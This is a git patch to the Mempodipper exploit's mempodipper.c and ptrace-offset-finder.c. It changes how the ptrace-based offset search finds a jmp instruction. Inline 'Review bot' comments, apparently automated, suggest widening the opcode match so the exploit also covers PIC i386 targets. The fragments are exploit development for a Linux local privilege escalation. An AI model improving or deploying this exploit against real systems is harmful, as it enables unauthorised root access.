From 513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Tue, 24 Jan 2012 17:38:32 +0100
Subject: Search for IP of next jmp instead.
---
 mempodipper.c | 10 +++-------
 ptrace-offset-finder.c | 9 +++------
 2 files changed, 6 insertions(+), 13 deletions(-)
diff --git a/mempodipper.c b/mempodipper.c
index dcc037c..e35d62a 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
 #define _LARGEFILE64_SOURCE
 #include
-#include
 #include
 #include
 #include
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
 #error "That platform is not supported."
 #endif
 if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
 }
 }
 } else {
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c
index d339c18..5a5daab 100644
--- a/ptrace-offset-finder.c
+++ b/ptrace-offset-finder.c
@@ -1,6 +1,5 @@
 #include
 #include
-#include
 #include
 #include
 #include
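Review bot: The new test in ptrace_address() matches only the byte pair `ff 25`, which is `jmp *disp32` on i386 or `jmp *[rip+disp32]` on x86-64, so the `/* jmp r/m32 */` comment over-claims: 0x25 is one specific ModRM byte, not the whole `ff /4` family. If one of the platform arms above the `#error` is i386 and the target binary is built PIC/PIE, its PLT stubs are encoded `ff a3` (`jmp *disp32(%ebx)`) and this check will never fire; either widen it to `if ((instruction & 0xffff) == 0x25ff || (instruction & 0xffff) == 0xa3ff)` or state the limitation in the comment, e.g. `/* ff 25: jmp *disp32 (i386 non-PIC) / jmp *[rip+disp32] (x86-64) — the PLT stub form we expect */`. A failed PTRACE_PEEKTEXT also returns -1 with errno set, which is indistinguishable from a data word unless errno is zeroed before the call and checked after it; as written, a read error silently counts as a non-match and the search just continues. The enclosing function and the loop this presumably sits in begin and end outside the hunk.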
@@ -41,11 +40,9 @@ int main(int argc, char *argv[])
 #error "That platform is not supported."
 #endif
 if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- printf("0x%lx\n", instruction_pointer + offset);
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) {
+ printf("0x%lx\n", instruction_pointer);
 break;
 }
 }
-- 
cgit v1.2.3-59-g8ed1b
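Review bot: The opcode check in main() pins the ModRM byte as well as the opcode, so `0x25ff` matches only `jmp *disp32` / `jmp *[rip+disp32]`, not every `jmp r/m32` as the comment says; a PIC i386 PLT stub (`ff a3`, `jmp *disp32(%ebx)`) would fall through and the finder would print nothing before the bound is reached. This matcher duplicates the one added to ptrace_address() in mempodipper.c, so whichever encodings the exploit accepts should be accepted here as well, e.g. `if ((instruction & 0xffff) == 0x25ff || (instruction & 0xffff) == 0xa3ff) {`. The ptrace() result is also consumed without clearing errno before the call and testing it afterwards, so a PTRACE_PEEKTEXT failure (-1) is silently treated as a non-match rather than reported. main() begins before the hunk, and the `break` leaves a loop whose header is not shown.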